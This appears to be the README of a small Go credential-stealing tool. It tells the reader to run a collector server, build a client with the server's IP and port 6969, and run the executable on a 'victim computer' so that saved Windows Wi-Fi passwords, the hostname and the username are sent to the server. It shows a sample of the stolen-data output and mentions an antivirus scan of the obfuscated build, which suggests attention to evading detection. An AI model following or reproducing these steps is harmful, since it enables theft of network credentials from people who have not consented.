Get saved wifi passwords of a windows computer in a server.
Run the server
$ go run server.go
Then put the ip:6969 of your server in main.go file Build main.go
$ go build main.go
Then run the generated exe in victim computer
Possible output
{
"hostname":hostname,
"time":"hr:min:ss_d-m-y",
"username":"hostname\\user",
"wifipw":{
"ESSID":password,
...
...
}
}
Virus Total scan after built with grable